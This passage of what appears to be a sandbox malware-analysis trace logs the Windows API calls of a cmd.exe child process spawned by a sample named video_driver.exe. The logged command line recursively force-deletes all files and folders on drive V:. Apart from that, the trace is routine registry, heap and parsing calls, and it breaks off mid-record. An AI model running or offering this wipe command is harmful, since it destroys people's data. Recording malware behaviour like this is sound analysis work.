() returned 0x1b5 [0065.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.741] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.741] exit (_Code=0) Process: id = "42" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40d31000" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0xbac [0065.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fb84 | out: lpSystemTimeAsFileTime=0x36fb84*(dwLowDateTime=0x50ecbc0, dwHighDateTime=0x1d62400)) [0065.830] GetCurrentProcessId () returned 0xbc0 [0065.830] GetCurrentThreadId () returned 0xbac [0065.830] GetTickCount () returned 0x1147e54 [0065.830] QueryPerformanceCounter (in: lpPerformanceCount=0x36fb7c | out: lpPerformanceCount=0x36fb7c*=18596339357) returned 1 [0065.831] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0065.832] __set_app_type (_Type=0x1) [0065.832] __p__fmode () returned 0x770331f4 [0065.832] __p__commode () returned 0x770331fc [0065.832] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0065.832] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0065.832] GetCurrentThreadId () returned 0xbac [0065.832] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbac) returned 0x60 [0065.833] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.833] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0065.833] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.833] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x36fb14 | out: phkResult=0x36fb14*=0x0) returned 0x2 [0065.834] VirtualQuery (in: lpAddress=0x36fb4b, lpBuffer=0x36fae4, dwLength=0x1c | out: lpBuffer=0x36fae4*(BaseAddress=0x36f000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.834] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x36fae4, dwLength=0x1c | out: lpBuffer=0x36fae4*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.834] VirtualQuery (in: lpAddress=0x271000, lpBuffer=0x36fae4, dwLength=0x1c | out: lpBuffer=0x36fae4*(BaseAddress=0x271000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.834] VirtualQuery (in: lpAddress=0x273000, lpBuffer=0x36fae4, dwLength=0x1c | out: lpBuffer=0x36fae4*(BaseAddress=0x273000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.834] VirtualQuery (in: lpAddress=0x370000, lpBuffer=0x36fae4, dwLength=0x1c | out: lpBuffer=0x36fae4*(BaseAddress=0x370000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.834] GetConsoleOutputCP () returned 0x1b5 [0065.834] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.834] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0065.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.834] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0065.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.835] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.835] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.835] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.835] GetEnvironmentStringsW () returned 0x3f20f8* [0065.836] GetProcessHeap () returned 0x3e0000 [0065.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xaca) returned 0x3f2bd0 [0065.836] FreeEnvironmentStringsW (penv=0x3f20f8) returned 1 [0065.836] GetProcessHeap () returned 0x3e0000 [0065.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4) returned 0x3f1898 [0065.836] GetEnvironmentStringsW () returned 0x3f20f8* [0065.836] GetProcessHeap () returned 0x3e0000 [0065.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xaca) returned 0x3f36a8 [0065.836] FreeEnvironmentStringsW (penv=0x3f20f8) returned 1 [0065.836] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36ea84 | out: phkResult=0x36ea84*=0x68) returned 0x0 [0065.836] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x0, lpData=0x36ea90*=0x0, lpcbData=0x36ea88*=0x1000) returned 0x2 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x1, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x0, lpData=0x36ea90*=0x1, lpcbData=0x36ea88*=0x1000) returned 0x2 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x0, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x40, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x40, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x0, lpData=0x36ea90*=0x40, lpcbData=0x36ea88*=0x1000) returned 0x2 [0065.837] RegCloseKey (hKey=0x68) returned 0x0 [0065.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36ea84 | out: phkResult=0x36ea84*=0x68) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x0, lpData=0x36ea90*=0x40, lpcbData=0x36ea88*=0x1000) returned 0x2 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x1, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x0, lpData=0x36ea90*=0x1, lpcbData=0x36ea88*=0x1000) returned 0x2 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x0, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x9, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.837] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x4, lpData=0x36ea90*=0x9, lpcbData=0x36ea88*=0x4) returned 0x0 [0065.838] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36ea8c, lpData=0x36ea90, lpcbData=0x36ea88*=0x1000 | out: lpType=0x36ea8c*=0x0, lpData=0x36ea90*=0x9, lpcbData=0x36ea88*=0x1000) returned 0x2 [0065.838] RegCloseKey (hKey=0x68) returned 0x0 [0065.838] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6b [0065.838] srand (_Seed=0x5eb34b6b) [0065.838] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q" [0065.838] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q" [0065.838] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.838] GetProcessHeap () returned 0x3e0000 [0065.838] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f20f8 [0065.838] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.838] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.838] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.839] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.839] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.839] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.839] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.839] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.839] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.839] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.839] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.839] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.839] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.839] GetProcessHeap () returned 0x3e0000 [0065.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f2bd0 | out: hHeap=0x3e0000) returned 1 [0065.839] GetEnvironmentStringsW () returned 0x3f2310* [0065.839] GetProcessHeap () returned 0x3e0000 [0065.839] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xae2) returned 0x3f4c70 [0065.839] FreeEnvironmentStringsW (penv=0x3f2310) returned 1 [0065.839] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.839] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.840] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.840] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.840] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.840] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.840] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.840] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.840] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.840] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.840] GetProcessHeap () returned 0x3e0000 [0065.840] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x54) returned 0x3f17c8 [0065.840] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x36f850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x36f850, lpFilePart=0x36f84c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f84c*="Desktop") returned 0x25 [0065.840] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.840] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x36f5cc | out: lpFindFileData=0x36f5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3f5760 [0065.840] FindClose (in: hFindFile=0x3f5760 | out: hFindFile=0x3f5760) returned 1 [0065.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x36f5cc | out: lpFindFileData=0x36f5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3f5760 [0065.841] FindClose (in: hFindFile=0x3f5760 | out: hFindFile=0x3f5760) returned 1 [0065.841] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0065.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x36f5cc | out: lpFindFileData=0x36f5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3f5760 [0065.841] FindClose (in: hFindFile=0x3f5760 | out: hFindFile=0x3f5760) returned 1 [0065.841] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.841] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0065.841] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0065.841] GetProcessHeap () returned 0x3e0000 [0065.841] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c70 | out: hHeap=0x3e0000) returned 1 [0065.841] GetEnvironmentStringsW () returned 0x3f4180* [0065.841] GetProcessHeap () returned 0x3e0000 [0065.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb36) returned 0x3f5fa0 [0065.842] FreeEnvironmentStringsW (penv=0x3f4180) returned 1 [0065.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.842] GetProcessHeap () returned 0x3e0000 [0065.842] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f17c8 | out: hHeap=0x3e0000) returned 1 [0065.842] GetProcessHeap () returned 0x3e0000 [0065.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400e) returned 0x3f6ae0 [0065.842] GetProcessHeap () returned 0x3e0000 [0065.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa0) returned 0x3f2e50 [0065.843] GetProcessHeap () returned 0x3e0000 [0065.843] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ae0 | out: hHeap=0x3e0000) returned 1 [0065.843] GetConsoleOutputCP () returned 0x1b5 [0065.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.843] GetUserDefaultLCID () returned 0x409 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x36f990, cchData=128 | out: lpLCData="0") returned 2 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x36f990, cchData=128 | out: lpLCData="0") returned 2 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x36f990, cchData=128 | out: lpLCData="1") returned 2 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0065.844] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0065.845] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.846] GetProcessHeap () returned 0x3e0000 [0065.846] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x20c) returned 0x3f2ef8 [0065.846] GetConsoleTitleW (in: lpConsoleTitle=0x3f2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0065.846] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.846] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0065.847] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0065.847] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0065.847] GetProcessHeap () returned 0x3e0000 [0065.847] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f6ae0 [0065.847] GetProcessHeap () returned 0x3e0000 [0065.847] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4008) returned 0x3faaf8 [0065.848] GetProcessHeap () returned 0x3e0000 [0065.848] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f57e0 [0065.848] GetEnvironmentVariableW (in: lpName="p IN (\"V", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="CD") returned 13 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="ERRORLEVEL") returned 11 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="CMDEXTVERSION") returned 13 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="CMDCMDLINE") returned 13 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="DATE") returned 12 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="TIME") returned -4 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="RANDOM") returned -2 [0065.848] _wcsicmp (_String1="p IN (\"V", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.848] GetProcessHeap () returned 0x3e0000 [0065.848] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f57e0 | out: hHeap=0x3e0000) returned 1 [0065.848] GetProcessHeap () returned 0x3e0000 [0065.848] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3faaf8 | out: hHeap=0x3e0000) returned 1 [0065.848] GetProcessHeap () returned 0x3e0000 [0065.848] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4008) returned 0x3faaf8 [0065.849] GetProcessHeap () returned 0x3e0000 [0065.849] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3faaf8 | out: hHeap=0x3e0000) returned 1 [0065.849] GetProcessHeap () returned 0x3e0000 [0065.849] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ae0 | out: hHeap=0x3e0000) returned 1 [0065.849] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.849] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.849] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.849] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.849] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.849] GetProcessHeap () returned 0x3e0000 [0065.849] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3110 [0065.849] GetProcessHeap () returned 0x3e0000 [0065.849] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe) returned 0x3effc0 [0065.850] GetProcessHeap () returned 0x3e0000 [0065.850] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f57e0 [0065.850] GetProcessHeap () returned 0x3e0000 [0065.851] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f57e0, Size=0x16) returned 0x3f1800 [0065.851] GetProcessHeap () returned 0x3e0000 [0065.851] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f1800) returned 0x16 [0065.851] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0065.851] GetProcessHeap () returned 0x3e0000 [0065.851] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3170 [0065.851] GetProcessHeap () returned 0x3e0000 [0065.851] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 0x3f31d0 [0065.851] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.851] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.852] GetProcessHeap () returned 0x3e0000 [0065.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3f31f0 [0065.852] GetProcessHeap () returned 0x3e0000 [0065.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1c) returned 0x3f57e0 [0065.852] GetProcessHeap () returned 0x3e0000 [0065.852] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f57e0, Size=0x14) returned 0x3f3210 [0065.852] GetProcessHeap () returned 0x3e0000 [0065.852] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f3210) returned 0x14 [0065.852] _wcsicmp (_String1="del", _String2=")") returned 59 [0065.853] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0065.853] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0065.853] _wcsicmp (_String1="IF", _String2="del") returned 5 [0065.853] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0065.853] _wcsicmp (_String1="REM", _String2="del") returned 14 [0065.853] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0065.853] GetProcessHeap () returned 0x3e0000 [0065.853] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3230 [0065.853] GetProcessHeap () returned 0x3e0000 [0065.853] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3effd8 [0065.853] GetProcessHeap () returned 0x3e0000 [0065.853] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x28) returned 0x3f3290 [0065.854] GetProcessHeap () returned 0x3e0000 [0065.854] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f32c0 [0065.855] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0065.855] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0065.855] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0065.855] GetProcessHeap () returned 0x3e0000 [0065.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3320 [0065.855] GetProcessHeap () returned 0x3e0000 [0065.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x44) returned 0x3f3380 [0065.855] GetProcessHeap () returned 0x3e0000 [0065.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 